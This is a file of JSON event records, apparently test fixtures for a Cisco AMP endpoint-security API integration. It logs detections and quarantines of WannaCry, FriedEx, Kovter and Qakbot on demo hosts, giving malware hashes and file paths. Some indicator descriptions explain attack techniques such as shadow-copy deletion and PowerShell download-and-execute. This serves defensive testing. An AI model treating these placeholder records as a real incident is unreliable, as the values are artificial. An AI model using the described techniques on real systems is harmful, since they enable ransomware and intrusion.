-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":893000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437902","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":846000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437901","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":846000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437900","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":456000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437899","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":643000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503299","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":957000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179209167470598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":894000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3020,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":879000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179209167470599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3808,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":879000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3020,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":879000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":847000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503301","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":847000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503299","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qeriuwjhrf","file_path":"\\\\?\\C:\\Windows\\qeriuwjhrf","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3020,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583840597369422000,"timestamp":1610621973,"timestamp_nanoseconds":231000000,"date":"2021-01-14T10:59:33+00:00","event_type":"Malicious Activity Detection","event_type_id":1090519105,"detection":"W32.MAP.Ransomware.rewrite","detection_id":"6583840593074454529","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mscorsvw.exe","file_path":"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0","sha1":"c78f4c22dd195a1791472a2c271a0c85b53900d9","md5":"75a758a0c5cea48c9922d64a113d0f9d"},"parent":{"process_id":480,"disposition":"Clean","file_name":"services.exe","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536","sha1":"ff658a36899e43fec3966d608b4aa4472de7a378","md5":"71c85477df9347fe8e7bc55768473fca"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6701398782847286000,"timestamp":1610621970,"timestamp_nanoseconds":182000000,"date":"2021-01-14T10:59:30+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621970,"start_date":"2021-01-14T10:59:30+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"file:///C%3A/Windows/SysWOW64/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Malicious","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136036637603000,"timestamp":1610621707,"timestamp_nanoseconds":260000000,"date":"2021-01-14T10:55:07+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621707,"start_date":"2021-01-14T10:55:07+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"file:///C%3A/Windows/system32/cmd.exe","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"},"parent":{"disposition":"Clean","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066250000100,"timestamp":1610621237,"timestamp_nanoseconds":250000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066228000300,"timestamp":1610621237,"timestamp_nanoseconds":228000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective 